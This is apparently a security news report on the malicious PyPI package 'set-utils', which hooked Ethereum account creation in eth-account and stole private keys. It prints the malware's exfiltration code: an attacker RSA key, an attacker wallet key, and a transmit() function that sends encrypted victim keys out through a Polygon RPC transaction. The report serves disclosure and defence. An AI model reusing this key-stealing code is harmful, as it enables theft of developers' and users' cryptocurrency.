The Socket Research Team has discovered a sophisticated malicious PyPI package named ‘set-utils’ designed to steal Ethereum private keys from unsuspecting developers.
This package, which has been downloaded over 1,000 times since January 29, 2025, disguises itself as a simple utility for Python sets, mimicking legitimate and widely-used libraries such as python-utils (712M+ downloads) and utils (23.5M+ downloads).
The malware specifically targets blockchain developers using Python-based wallet management libraries, particularly those working with eth-account for Ethereum wallet creation and management.
.png
)
By silently intercepting standard wallet creation methods, the malicious package creates a significant security risk for blockchain developers, DeFi projects, crypto exchanges, and individual users managing Ethereum wallets with Python automation.
What makes this attack particularly dangerous is its stealthy exfiltration method.
Instead of using traditional network communication channels that might trigger security alerts, the malware transmits stolen private keys via blockchain transactions through the Polygon RPC network.
This unusual approach helps attackers evade detection while compromising valuable cryptocurrency assets.
Technical investigation reveals the malware operates in multiple stages.
Security experts at Socket Research Team noted that initially it embeds an attacker-controlled RSA public key and Ethereum wallet address used for encrypting and transmitting stolen credentials.
The package contains code similar to the following:-
pycrypto_pubkey = b"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoE/n0a0nNk3hGlDv+y
cipher = PKCS1_OAEP.new(RSA.import_key(pycrypto_pubkey))
sender_account = Account.from_key(
"0xa3a1d8ee43adc1024b2407b2230e018bd1752ebc819b8abe873b8a3aa5acaee3"
)Technical Mechanism of the Attack
The core exfiltration functionality is handled by a transmit() function that encrypts private keys with the attacker’s public key and sends them within Ethereum transactions via the Polygon RPC endpoint.
This function, shown below, represents the primary theft mechanism:-
def transmit(acct):
try:
from web3 import Web3
from hexbytes import HexBytes
web3 = Web3(Web3.HTTPProvider("https://rpc-amoy.polygon.technology/"))
transaction = {
"value": 0,
"nonce": web3.eth.get_transaction_count(sender_account.address),
"gas": 60000,
"gasPrice": web3.eth.gas_price,
"chainId": web3.eth.chain_id,
"data": cipher.encrypt(acct.key),
}
(
v,
r,
s,
encoded_transaction,
) = sign_transaction_dict(acct._key_obj, transaction, blobs=None)
tx_hash = web3.eth.send_raw_transaction(HexBytes(encoded_transaction))
except:
pass.webp)
The malware modifies standard Ethereum account creation functions through a wrapper that exfiltrates credentials in the background using threading to avoid detection.
The augment_func wrapper ensures that whenever a user creates an Ethereum account, their private key is silently stolen and transmitted to the attacker.
Following the report from the Socket Research Team (Dhanesh Dodia, Sambarathi Sai, and Dwijay Chintakunta), the PyPI team has removed the malicious package to prevent further attacks.
Developers are advised to audit their dependencies regularly, implement automated scanning tools, and consider using security solutions like Socket’s GitHub app to detect suspicious packages before they can cause harm.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
